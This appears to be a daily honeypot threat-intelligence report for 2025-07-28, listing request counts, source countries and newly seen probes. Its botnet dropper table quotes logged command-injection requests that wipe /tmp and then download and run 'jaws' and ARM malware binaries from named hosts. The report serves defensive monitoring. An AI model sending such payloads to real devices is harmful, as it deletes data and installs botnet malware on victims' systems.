Skip to main content
  1. Daily-Posts/

Report: 2025-07-28

·338 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-28
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 12 new requests that have never been observed before (these were added to the monitored request database.).

A total of 431 requests were recorded during the day, originating from 5 different countries, with a peak of 124 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
CADubai
USDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
8.220.245.115GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.201.35GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
125.229.221.223GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/89.221.203.116:6969/bins/arm7;chmod+777+arm7;./arm7+selfrep.jaws;wget+http:/\x5C/89.221.203.116:6969/bins/arm;chmod+777+arm;./arm+selfrep.jaws; HTTP/1.1
8.222.162.163GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
115.190.45.48GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
132GET /index.htm HTTP/1.1
222GET http://91.224.59.5.sslip.io/check.txt HTTP/1.1
272GET /check.txt HTTP/1.1
1081\x00\x0E\x08\xCC\xA1\x08\x9D\xAB\xBD\xEA\xF2\x00\x00\x00\x00\x00
1091\x00\x0E8\xCC\xA1\x08\x9D\xAB\xBD\xEA\xF2\x00\x00\x00\x00\x00
1311GET /environment.php HTTP/1.1
1341GET /phpinfo.aspx HTTP/1.1
1351GET /phpinfo.jsp HTTP/1.1
1491GET /cgi-bin/ HTTP/1.0
1501GET /cgi-bin/FormMail.pl HTTP/1.0
1511\x00\x0E\x08\xBA\xCA!w\xA7\x7F!\xD3\x00\x00\x00\x00\x00
1521\x00\x0E8\xBA\xCA!w\xA7\x7F!\xD3\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0124US
148IN
237GB
320JP
419RU
519FR
618BG
718DE
815AU
915PL
1014RO
1111NL
1211CA
1311CN
1410SC
156CZ
164LT
174BE
184SG
193VN
203GH
212KZ
222ES
232CH
242ZA
251KR
261HK
271MU
281MC
291BR
301AZ
311IL
321TW
331IR

Related

Report: 2025-07-27
·337 words
Repport Daily
Report: 2025-07-26
·272 words
Repport Daily
Report: 2025-07-25
·361 words
Repport Daily